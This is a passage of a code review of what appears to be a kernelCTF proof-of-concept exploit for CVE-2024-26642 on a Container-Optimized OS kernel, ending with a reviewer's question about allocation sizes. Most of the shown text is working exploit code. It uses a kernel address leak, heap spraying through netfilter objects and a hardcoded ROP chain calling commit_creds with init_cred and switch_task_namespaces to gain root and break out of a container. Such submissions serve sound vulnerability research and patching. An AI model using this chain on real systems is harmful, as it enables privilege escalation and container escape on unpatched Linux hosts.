pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c

```diff
@@ -0,0 +1,502 @@
+    get_setelem(socket2, table, hash_set_2, &hash_key,8);
+    nl_recvmsgs_default(socket2);
+    nl_recvmsgs_default(socket2);
+    printf("Leak end.\n");
+    printf("Start preparing ROP gadget in heap.\n");
+    kernel_off = leak_ops - 0xFFFFFFFF82ACB840;
+    char *ops = malloc(0x100);
+    //ops->dump
+    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF81519693;//leave ; ret
+    //ops->type
+    *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF8371BF00;//last type
+
+    *(uint64_t *)&ops[0x08] = kernel_off + 0xffffffff81081910;//pop rdi; ret
+    *(uint64_t *)&ops[0x10] = kernel_off + 0xFFFFFFFF83462180;//init_cred
+    *(uint64_t *)&ops[0x18] = kernel_off + 0xFFFFFFFF8110E830;//commit_creds;
+    *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff81068153;//pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
+    *(uint64_t *)&ops[0x28] = 1;
+    *(uint64_t *)&ops[0x58] = kernel_off + 0xFFFFFFFF81105680;//find_task_by_vpid
+    *(uint64_t *)&ops[0x60] = kernel_off + 0xFFFFFFFF8106815A;//pop rbp ; pop rbx ; ret ; because ops->0x70 is the last_type
+    *(uint64_t *)&ops[0x78] = kernel_off + 0xffffffff8102c701;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
+    *(uint64_t *)&ops[0x88] = kernel_off + 0xFFFFFFFF817E4E5E;//pop rsi ; ret
+    *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF83461F40;//init_nsproxy
+    *(uint64_t *)&ops[0x98] = kernel_off + 0xFFFFFFFF8110CE30;//switch_task_namespaces
+    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF82002117;//swapgs; ret
+    *(uint64_t *)&ops[0xa8] = kernel_off + 0xFFFFFFFF822011A7;//iretq
+    *(uint64_t *)&ops[0xb0] = (uint64_t)shell;
+    *(uint64_t *)&ops[0xb8] = user_cs;
+    *(uint64_t *)&ops[0xc0] = user_rflags;
+    *(uint64_t *)&ops[0xc8] = user_rsp|8;
+    *(uint64_t *)&ops[0xd0] = user_ss;
+    //step 11
+    //free the last object.
+    for(i=0;i<0x40;i++){
+	if(i==0x20)
+		continue;
+        snprintf(obj_name,0x40,"obj_for_leak_%d",i);
+        del_obj(socket, table, obj_name, NFT_OBJECT_CT_EXPECT);
+    }
+    //heap spray to fill target heap
+    spray_tables(socket,0x800, ops, 0xe8);
+    printf("Finish prepare.\n");
+    target_heap = obj_a;
+}
+
+
+void jmp_rop(struct nl_sock * socket){
+    char *pipapo_set = "set pipapo for rop";
+    char *hash_set_for_expr = "set hashtable for expr";
+    char *table = "table for rop";
+    char *target_chain = "chain for rop";
+    int i;
+    printf("start rop\n");
+    new_table(socket, table);
+    cur_handle = 0;
+    new_chain(socket, table, target_chain, 0);
+    
+    new_set_pipapo_for_chain(socket, table, pipapo_set, 0x40);
+    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10);
+    nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+
+    //step 1
+    //create some elements to make chain->use = 0x20
+    
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    char *key = malloc(0x40);
```

Comment:
Comment here why you choose the sizes of `0x40`, `48` and `0x100`. Does it matter from the exploitation point-of-view? E.g. to which cache get into?